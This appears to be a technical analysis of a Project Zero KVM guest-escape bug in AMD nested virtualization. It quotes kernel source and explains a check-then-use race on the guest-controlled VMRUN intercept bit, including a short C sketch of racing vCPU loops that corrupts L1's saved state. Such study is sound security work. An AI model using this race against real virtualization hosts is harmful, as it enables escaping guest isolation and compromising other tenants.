KVM Escape Vulnerability From Project Zero

Overview

Main reference links

Motivation

Most past KVM escapes were caused by bugs in the userspace qemu process; vulnerabilities in KVM's own kernel code are rare, which is what makes this bug worth studying.

Background

  • AMD's virtualization extension is called SVM. Its key instruction is VMRUN, which takes one implicit parameter: when the instruction executes, RAX must hold the physical address of a page-aligned VMCB (Intel's equivalent is the VMCS). A minimal sketch of issuing VMRUN follows the listing below.
  • Virtualization and nested virtualization basics are covered in other articles.
  • Most of the nested virtualization code lives in arch/x86/kvm/svm/nested.c; KVM's handling of an intercepted VMRUN is implemented in nested_svm_vmrun:
int nested_svm_vmrun(struct vcpu_svm *svm) // struct vcpu_svm is the per-vCPU structure
{
    int ret;
    struct vmcb *vmcb12;                    // the VMCB built by the guest hypervisor: L1 creates it to run L2
    struct vmcb *hsave = svm->nested.hsave; // host save area holding L1's state across VMRUN
    struct vmcb *vmcb = svm->vmcb;          // the VMCB bound to the currently running vCPU (vmcb01)
    struct kvm_host_map map;                // mapping object used to translate the GPA into a host mapping
    u64 vmcb12_gpa;

    vmcb12_gpa = svm->vmcb->save.rax; ** 1 ** // GPA inside L1 where the vmcb12 structure lives
    ret = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(vmcb12_gpa), &map); ** 2 ** // map that guest page using the map object above

    ret = kvm_skip_emulated_instruction(&svm->vcpu);

    vmcb12 = map.hva; // host virtual address of the mapping, so KVM can access vmcb12 directly

    if (!nested_vmcb_checks(svm, vmcb12)) { ** 3 ** // validate vmcb12's contents as soon as the mapping is done
        vmcb12->control.exit_code = SVM_EXIT_ERR;
        vmcb12->control.exit_code_hi = 0;
        vmcb12->control.exit_info_1 = 0;
        vmcb12->control.exit_info_2 = 0;
        goto out;
    }

    ...

    /*
     * Save the old vmcb, so we don't need to pick what we save, but can
     * restore everything when a VMEXIT occurs
     */
    // save vmcb01's guest state (= L1's state) into hsave
    hsave->save.es = vmcb->save.es;
    hsave->save.cs = vmcb->save.cs;
    hsave->save.ss = vmcb->save.ss;
    hsave->save.ds = vmcb->save.ds;
    hsave->save.gdtr = vmcb->save.gdtr;
    hsave->save.idtr = vmcb->save.idtr;
    hsave->save.efer = svm->vcpu.arch.efer;
    hsave->save.cr0 = kvm_read_cr0(&svm->vcpu);
    hsave->save.cr4 = svm->vcpu.arch.cr4;
    hsave->save.rflags = kvm_get_rflags(&svm->vcpu);
    hsave->save.rip = kvm_rip_read(&svm->vcpu);
    hsave->save.rsp = vmcb->save.rsp;
    hsave->save.rax = vmcb->save.rax;
    if (npt_enabled)
        hsave->save.cr3 = vmcb->save.cr3;
    else
        hsave->save.cr3 = kvm_read_cr3(&svm->vcpu);
    copy_vmcb_control_area(&hsave->control, &vmcb->control);
    svm->nested.nested_run_pending = 1;

    // enter L2
    if (enter_svm_guest_mode(svm, vmcb12_gpa, vmcb12)) ** 4 **
        goto out_exit_err;
    if (nested_svm_vmrun_msrpm(svm))
        goto out;
out_exit_err:
    svm->nested.nested_run_pending = 0;
    svm->vmcb->control.exit_code = SVM_EXIT_ERR;
    svm->vmcb->control.exit_code_hi = 0;
    svm->vmcb->control.exit_info_1 = 0;
    svm->vmcb->control.exit_info_2 = 0;
    nested_svm_vmexit(svm);
out:
    kvm_vcpu_unmap(&svm->vcpu, &map, true);
    return ret;
}
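
To make the first bullet concrete (as promised above), here is a minimal sketch of issuing VMRUN. This is my illustration, not code from the blog, and it assumes the standard SVM requirements: CPL0, EFER.SVME set, and RAX holding the physical address of a page-aligned VMCB.

/* Minimal sketch: must run at CPL0 with EFER.SVME enabled. */
static inline void vmrun(unsigned long vmcb_pa)
{
    asm volatile("vmrun %%rax"
                 :                  /* guest state is exchanged through the VMCB */
                 : "a"(vmcb_pa)     /* the implicit parameter: RAX = VMCB physical address */
                 : "memory", "cc");
}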
  • The function through which L0 enters L2 on L1's behalf is enter_svm_guest_mode; at this point we are still in the L0 context:
int enter_svm_guest_mode(struct vcpu_svm *svm, u64 vmcb12_gpa,
                         struct vmcb *vmcb12)
{
    int ret;
    svm->nested.vmcb12_gpa = vmcb12_gpa; // record vmcb12's GPA (as seen from L0) in the nested state

    // Copy vmcb12's control area straight into svm->nested.ctl (svm->vmcb here acts as vmcb02).
    // The problem: the checks earlier ran on the guest-mapped vmcb12, and the copy taken here
    // is not re-validated (this is the point the blog makes).
    load_nested_vmcb_control(svm, &vmcb12->control); // the 5.11 source doesn't seem to have this exact line; unclear why the blog shows it
    nested_prepare_vmcb_save(svm, vmcb12);   // in the 5.11 source this copies vmcb12's save area into svm->vmcb->save.*
    nested_prepare_vmcb_control(svm);        // in 5.11 this copies svm->nested.ctl into svm->vmcb->control and puts the vCPU into guest mode, ready to enter L2

    ret = nested_svm_load_cr3(&svm->vcpu, vmcb12->save.cr3,
                              nested_npt_enabled(svm));
    if (ret)
        return ret;

    svm_set_gif(svm, true); // set the global interrupt flag

    return 0;
}

static void load_nested_vmcb_control(struct vcpu_svm *svm,
                                     struct vmcb_control_area *control)
{
    copy_vmcb_control_area(&svm->nested.ctl, control);
    ...
}
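
Spelled out, the check and the use are two separate reads of guest-writable memory. The annotated flow below is my condensation of nested_svm_vmrun and load_nested_vmcb_control, not kernel code:

/* vmcb12 = map.hva points into memory that L1 can write at any time. */
nested_vmcb_checks(svm, vmcb12);                            /* fetch #1: validate */
copy_vmcb_control_area(&svm->nested.ctl, &vmcb12->control); /* fetch #2: use */
/* Another vCPU can flip bits in vmcb12->control between the two fetches,
 * so svm->nested.ctl may end up holding values that never passed the checks. */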


BUG

As shown above, enter_svm_guest_mode consumes vmcb12 without re-checking it at the point of use (no double check on the copy). So how can this bug be exploited? First, let's look at what nested_vmcb_check_controls actually verifies:

static bool nested_vmcb_check_controls(struct vmcb_control_area *control)
{
    if ((vmcb_is_intercept(control, INTERCEPT_VMRUN)) == 0)
        return false;

    if (control->asid == 0) // the ASID distinguishes the address spaces of different guests
        return false;

    if ((control->nested_ctl & SVM_NESTED_CTL_NP_ENABLE) &&
        !npt_enabled) // nested paging may only be requested if NPT is enabled on the host
        return false;

    return true;
}

The first check verifies that the VMRUN intercept is enabled: the SVM VMCB contains a bit controlling whether VMRUN executed inside the guest is intercepted, and clearing it is invalid because running nested guests without intercepting VMRUN is not supported by the hardware, so such a VMRUN must fail. However, the check operates on vmcb12, which lives in guest memory. On a multi-core system we can race it: another vCPU flips this bit back and forth in a tight loop, so the bit can be set when nested_vmcb_checks reads it at ** 3 ** yet cleared by the time load_nested_vmcb_control copies the control area, leaving svm->nested.ctl without INTERCEPT_VMRUN.
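
A hypothetical sketch of that race from inside L1 (simplified: in reality both loops must run at CPL0 in the L1 guest kernel, pinned to different vCPUs, and the offset 0x010 / bit 0 location of the VMRUN intercept in the VMCB control area is my reading of the AMD APM, so verify it before relying on it):

#include <stdint.h>

static volatile uint8_t *vmcb12;   /* page-aligned VMCB that L1 built for L2 */

/* vCPU A: keep toggling the VMRUN intercept bit in guest-owned memory.
 * Assumption: control-area offset 0x010, bit 0 is INTERCEPT_VMRUN. */
static void flipper(void)
{
    for (;;)
        vmcb12[0x010] ^= 1;
}

/* vCPU B: keep launching L2. If the bit is clear during nested_vmcb_checks,
 * the VMRUN merely fails with SVM_EXIT_ERR; if it is clear only during
 * load_nested_vmcb_control, the race is won. */
static void runner(uint64_t vmcb12_pa)
{
    for (;;)
        asm volatile("vmrun %%rax" : : "a"(vmcb12_pa) : "memory", "cc");
}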

Executing VMRUN inside a guest always triggers a VM exit to L0; what matters is how that exit is routed. Let's look at KVM's VM-exit handler, handle_exit in arch/x86/kvm/svm/svm.c: on every exit it must decide whether the exit reason is handled by L0 itself or by the L1 hypervisor.

static int handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)
{
    struct vcpu_svm *svm = to_svm(vcpu);
    struct kvm_run *kvm_run = vcpu->run;
    u32 exit_code = svm->vmcb->control.exit_code;

    if (is_guest_mode(vcpu)) { // did the exit come from L2 or from L1? True means the vCPU was running L2.
        int vmexit;

        trace_kvm_nested_vmexit(exit_code, vcpu, KVM_ISA_SVM);

        vmexit = nested_svm_exit_special(svm); // interrupts and other special reasons (INTR, NMI, NPF) are handled by L0 first, returning NESTED_EXIT_HOST; everything else returns NESTED_EXIT_CONTINUE so the L1 checks run next

        // does the L1 hypervisor want this exit?
        if (vmexit == NESTED_EXIT_CONTINUE)
            vmexit = nested_svm_exit_handled(svm); // reflects the exit into L1 if L1 intercepts it

        if (vmexit == NESTED_EXIT_DONE) // the exit was already forwarded to L1 (nested_svm_vmexit ran inside nested_svm_exit_handled), so just resume the guest
            return 1;
    }
    ...
}

int nested_svm_exit_handled(struct vcpu_svm *svm)
{
    int vmexit;

    vmexit = nested_svm_intercept(svm); // decides who handles the exit: NESTED_EXIT_DONE if L1 intercepts it, NESTED_EXIT_HOST otherwise

    if (vmexit == NESTED_EXIT_DONE)
        nested_svm_vmexit(svm); // write the exit information into vmcb12 and switch back to the L1 context (restoring it from hsave)

    return vmexit;
}

static int nested_svm_intercept(struct vcpu_svm *svm)
{
    // exit_code == SVM_EXIT_VMRUN (== INTERCEPT_VMRUN) when the L2 guest executes VMRUN
    u32 exit_code = svm->vmcb->control.exit_code;
    int vmexit = NESTED_EXIT_HOST;

    switch (exit_code) {
    case SVM_EXIT_MSR:
        vmexit = nested_svm_exit_handled_msr(svm);
        break;
    case SVM_EXIT_IOIO:
        vmexit = nested_svm_intercept_ioio(svm);
        break;

    default: {
        // check whether the corresponding intercept bit is set in svm->nested.ctl;
        // in the normal (non-raced) case INTERCEPT_VMRUN is set here, so this returns NESTED_EXIT_DONE
        if (vmcb_is_intercept(&svm->nested.ctl, exit_code))
            vmexit = NESTED_EXIT_DONE;
    }
    }

    return vmexit;
}
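
Condensed into one self-contained function, the routing decision looks like this. This is my paraphrase, and it assumes (as the default case above shows) that exit codes index L1's requested intercept bitmap directly:

#include <stdbool.h>
#include <stdint.h>

enum who { HANDLED_BY_L0, REFLECTED_TO_L1 };

/* stand-in for the intercept state L1 requested (svm->nested.ctl) */
struct l1_intercepts { uint64_t bits[4]; };

static bool l1_intercepts_exit(const struct l1_intercepts *ctl, uint32_t exit_code)
{
    /* mirrors vmcb_is_intercept(): the exit code indexes the intercept bitmap */
    return ctl->bits[exit_code / 64] & (1ULL << (exit_code % 64));
}

static enum who route_l2_exit(const struct l1_intercepts *ctl, uint32_t exit_code,
                              bool special /* INTR, NMI, NPF, ... */)
{
    if (special)                            /* nested_svm_exit_special(): L0 goes first */
        return HANDLED_BY_L0;
    if (l1_intercepts_exit(ctl, exit_code))
        return REFLECTED_TO_L1;             /* nested_svm_vmexit() reflects it into L1 */
    return HANDLED_BY_L0;                   /* e.g. an L2 VMRUN whose intercept bit was raced away */
}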
int nested_svm_vmexit(struct vcpu_svm *svm)
{
    int rc;
    struct vmcb *vmcb12;
    struct vmcb *hsave = svm->nested.hsave;
    struct vmcb *vmcb = svm->vmcb;
    struct kvm_host_map map;

    rc = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(svm->nested.vmcb12_gpa), &map);
    if (rc) {
        if (rc == -EINVAL)
            kvm_inject_gp(&svm->vcpu, 0);
        return 1;
    }

    vmcb12 = map.hva; // map vmcb12 into L0 so it can be accessed directly

    /* Exit Guest-Mode */
    leave_guest_mode(&svm->vcpu);
    svm->nested.vmcb12_gpa = 0;
    WARN_ON_ONCE(svm->nested.nested_run_pending);

    kvm_clear_request(KVM_REQ_GET_NESTED_STATE_PAGES, &svm->vcpu);

    /* in case we halted in L2 */
    svm->vcpu.arch.mp_state = KVM_MP_STATE_RUNNABLE;

    /* Give the current vmcb to the guest */

    vmcb12->save.es = vmcb->save.es;
    vmcb12->save.cs = vmcb->save.cs;
    vmcb12->save.ss = vmcb->save.ss;
    vmcb12->save.ds = vmcb->save.ds;
    vmcb12->save.gdtr = vmcb->save.gdtr;
    vmcb12->save.idtr = vmcb->save.idtr;
    vmcb12->save.efer = svm->vcpu.arch.efer;
    vmcb12->save.cr0 = kvm_read_cr0(&svm->vcpu);
    vmcb12->save.cr3 = kvm_read_cr3(&svm->vcpu);
    vmcb12->save.cr2 = vmcb->save.cr2;
    vmcb12->save.cr4 = svm->vcpu.arch.cr4;
    vmcb12->save.rflags = kvm_get_rflags(&svm->vcpu);
    vmcb12->save.rip = kvm_rip_read(&svm->vcpu);
    vmcb12->save.rsp = kvm_rsp_read(&svm->vcpu);
    vmcb12->save.rax = kvm_rax_read(&svm->vcpu);
    vmcb12->save.dr7 = vmcb->save.dr7;
    vmcb12->save.dr6 = svm->vcpu.arch.dr6;
    vmcb12->save.cpl = vmcb->save.cpl;

    vmcb12->control.int_state = vmcb->control.int_state;
    vmcb12->control.exit_code = vmcb->control.exit_code;
    vmcb12->control.exit_code_hi = vmcb->control.exit_code_hi;
    vmcb12->control.exit_info_1 = vmcb->control.exit_info_1;
    vmcb12->control.exit_info_2 = vmcb->control.exit_info_2;

    if (vmcb12->control.exit_code != SVM_EXIT_ERR)
        nested_vmcb_save_pending_event(svm, vmcb12);

    if (svm->nrips_enabled)
        vmcb12->control.next_rip = vmcb->control.next_rip;

    vmcb12->control.int_ctl = svm->nested.ctl.int_ctl;
    vmcb12->control.tlb_ctl = svm->nested.ctl.tlb_ctl;
    vmcb12->control.event_inj = svm->nested.ctl.event_inj;
    vmcb12->control.event_inj_err = svm->nested.ctl.event_inj_err;

    vmcb12->control.pause_filter_count =
        svm->vmcb->control.pause_filter_count;
    vmcb12->control.pause_filter_thresh =
        svm->vmcb->control.pause_filter_thresh;

    /* Restore the original control entries */
    copy_vmcb_control_area(&vmcb->control, &hsave->control);

    /* On vmexit the GIF is set to false */
    svm_set_gif(svm, false);

    svm->vmcb->control.tsc_offset = svm->vcpu.arch.tsc_offset =
        svm->vcpu.arch.l1_tsc_offset;

    svm->nested.ctl.nested_cr3 = 0;

    /* Restore selected save entries */
    svm->vmcb->save.es = hsave->save.es;
    svm->vmcb->save.cs = hsave->save.cs;
    svm->vmcb->save.ss = hsave->save.ss;
    svm->vmcb->save.ds = hsave->save.ds;
    svm->vmcb->save.gdtr = hsave->save.gdtr;
    svm->vmcb->save.idtr = hsave->save.idtr;
    kvm_set_rflags(&svm->vcpu, hsave->save.rflags);
    svm_set_efer(&svm->vcpu, hsave->save.efer);
    svm_set_cr0(&svm->vcpu, hsave->save.cr0 | X86_CR0_PE);
    svm_set_cr4(&svm->vcpu, hsave->save.cr4);
    kvm_rax_write(&svm->vcpu, hsave->save.rax);
    kvm_rsp_write(&svm->vcpu, hsave->save.rsp);
    kvm_rip_write(&svm->vcpu, hsave->save.rip);
    svm->vmcb->save.dr7 = 0;
    svm->vmcb->save.cpl = 0;
    svm->vmcb->control.exit_int_info = 0;

    vmcb_mark_all_dirty(svm->vmcb);

    trace_kvm_nested_vmexit_inject(vmcb12->control.exit_code,
                                   vmcb12->control.exit_info_1,
                                   vmcb12->control.exit_info_2,
                                   vmcb12->control.exit_int_info,
                                   vmcb12->control.exit_int_info_err,
                                   KVM_ISA_SVM);

    kvm_vcpu_unmap(&svm->vcpu, &map, true);

    nested_svm_uninit_mmu_context(&svm->vcpu);

    rc = nested_svm_load_cr3(&svm->vcpu, hsave->save.cr3, false);
    if (rc)
        return 1;

    if (npt_enabled)
        svm->vmcb->save.cr3 = hsave->save.cr3;

    /*
     * Drop what we picked up for L2 via svm_complete_interrupts() so it
     * doesn't end up in L1.
     */
    svm->vcpu.arch.nmi_injected = false;
    kvm_clear_exception_queue(&svm->vcpu);
    kvm_clear_interrupt_queue(&svm->vcpu);

    return 0;
}

However, if the L1 guest exploited the race condition described above, svm->nested.ctl won't have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrun while still running inside the L2 guest context. nested_svm_vmrun isn't written to handle this situation and will blindly overwrite the L1 context stored in svm->nested.hsave with data from the currently active svm->vmcb, which contains data for the L2 guest.
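
Putting the chain together, this is my annotated summary of the sequence once the race is won:

/*
 * 1. L1 executes VMRUN         -> nested_svm_vmrun(): hsave := L1 state, enter L2;
 *                                 meanwhile another vCPU cleared INTERCEPT_VMRUN in
 *                                 vmcb12 between the check at ** 3 ** and the copy
 *                                 into svm->nested.ctl
 * 2. L2 executes VMRUN         -> VM exit, but svm->nested.ctl lacks INTERCEPT_VMRUN,
 *                                 so nested_svm_intercept() returns NESTED_EXIT_HOST
 *                                 and L0 calls nested_svm_vmrun() again while still
 *                                 in the L2 context
 * 3. second nested_svm_vmrun() -> hsave := current svm->vmcb state, i.e. *L2* state:
 *                                 L1's saved context is destroyed, and the next
 *                                 nested_svm_vmexit() will "restore" L1 from
 *                                 guest-controlled data
 */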